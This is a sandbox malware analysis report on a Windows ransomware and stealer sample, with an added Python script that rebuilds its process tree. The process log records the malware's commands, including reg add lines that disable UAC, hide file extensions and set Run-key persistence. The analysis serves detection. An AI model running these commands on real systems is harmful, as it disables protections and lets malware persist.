Malware Analysis Report

2025-06-16 00:03

Sample ID 241106-af3tsatrbq
Target db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N
SHA256 db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9
Tags discovery evasion persistence ransomware spyware stealer trojan
Score 10/10

Analysis Overview

Score 10/10

SHA256 db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9

Threat Level: Known bad

The file db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence ransomware spyware stealer trojan

UAC bypass

Modifies visibility of file extensions in Explorer

Renames multiple (86) files with added filename extension

Renames multiple (62) files with added filename extension

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Deletes itself

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 00:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 00:10

Reported

2024-11-06 00:12

Platform

win7-20240903-en

Max time kernel

120s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A (21 identical rows)

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A (21 identical rows)

Renames multiple (62) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Control Panel\International\Geo\Nation C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
N/A N/A C:\ProgramData\XggMMcAg\LkAAYskU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\WYUQIMko.exe = "C:\\Users\\Admin\\tIUAwkcA\\WYUQIMko.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LkAAYskU.exe = "C:\\ProgramData\\XggMMcAg\\LkAAYskU.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\WYUQIMko.exe = "C:\\Users\\Admin\\tIUAwkcA\\WYUQIMko.exe" C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LkAAYskU.exe = "C:\\ProgramData\\XggMMcAg\\LkAAYskU.exe" C:\ProgramData\XggMMcAg\LkAAYskU.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A (25 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (20 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A (11 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A (7 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A (63 identical rows)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A (42 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\tIUAwkcA\WYUQIMko.exe N/A (64 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2352 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\tIUAwkcA\WYUQIMko.exe (4 identical rows)
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe (4 identical rows)
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe (4 identical rows)
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe (4 identical rows)
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe (4 identical rows)
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
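
The rows above are the sandbox's WriteProcessMemory log, with several rows per parent/child pair (one per write during process start-up), so the first triage step is to de-duplicate them and rebuild the process tree. The Python below is an added example, not part of the sandbox output: it parses a subset of the rows copied verbatim from the table (the first pair is kept with two of its repeats to exercise the de-duplication), builds the tree, and reports which PIDs are running the sample's own image. Nothing beyond the row format shown in the table is assumed.

```python
"""Rebuild the process tree from 'PID X wrote to memory of Y' rows.

Added example; not part of the sandbox output.  RAW_ROWS is a subset of
the Signatures table above, copied verbatim.
"""
import re
from collections import defaultdict

ROW = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

SAMPLE = "db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

RAW_ROWS = r"""
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\XggMMcAg\LkAAYskU.exe
PID 2352 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2512 wrote to memory of 2848 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2352 wrote to memory of 2184 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2352 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2836 wrote to memory of 2608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2848 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2848 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 2848 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1436 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
"""


def parse_rows(text):
    """Yield one (parent_pid, child_pid, parent_image, child_image) per distinct row."""
    seen = set()
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # not a WriteProcessMemory row; skip
        rec = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        if rec not in seen:  # the sandbox logs each pair several times
            seen.add(rec)
            yield rec


def build_tree(records):
    """Return (children, image): children[pid] -> [child pids], image[pid] -> path."""
    children = defaultdict(list)
    image = {}
    for ppid, pid, pimg, cimg in records:
        children[ppid].append(pid)
        image.setdefault(ppid, pimg)
        image[pid] = cimg
    return children, image


def roots(children):
    """PIDs that appear as a parent but never as a child."""
    all_children = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in all_children)


def depth(children, pid, root):
    """Hops from root down to pid (root is 0); None if pid is not under root."""
    parent = {c: p for p, kids in children.items() for c in kids}
    hops = 0
    while pid != root:
        if pid not in parent:
            return None
        pid = parent[pid]
        hops += 1
    return hops


def instances_of(image, basename):
    """PIDs whose image path ends in basename (here: the sample's own name)."""
    return [pid for pid, path in image.items() if path.endswith(basename)]


def render(children, image, pid, indent=0, out=None):
    """Indented 'pid basename' lines, depth-first from pid."""
    out = [] if out is None else out
    name = image.get(pid, "?").rsplit("\\", 1)[-1]
    out.append("  " * indent + str(pid) + " " + name)
    for kid in children.get(pid, []):
        render(children, image, kid, indent + 1, out)
    return out


if __name__ == "__main__":
    kids, img = build_tree(parse_rows(RAW_ROWS))
    for root in roots(kids):
        print("\n".join(render(kids, img, root)))
    print("sample image running as PIDs:", sorted(instances_of(img, SAMPLE)))
```

Run stand-alone it prints the tree rooted at PID 2352: the sample spawns cmd (2512), which starts the sample again as PID 2848; that copy repeats the reg/cmd/cscript pattern and, through another cmd (2808), starts the sample a third time as PID 2612. Those three PIDs are the relaunch chain that the Processes section lists over and over, so a detection that keys on "same image re-spawned through cmd /c" collapses most of that list into one event.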

Processes

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

C:\Users\Admin\tIUAwkcA\WYUQIMko.exe

"C:\Users\Admin\tIUAwkcA\WYUQIMko.exe"

C:\ProgramData\XggMMcAg\LkAAYskU.exe

"C:\ProgramData\XggMMcAg\LkAAYskU.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IWMgwYQg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\eWEUIQso.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EmsMUAkI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DiAkkggQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mKgAkkUE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\caAgUEkA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

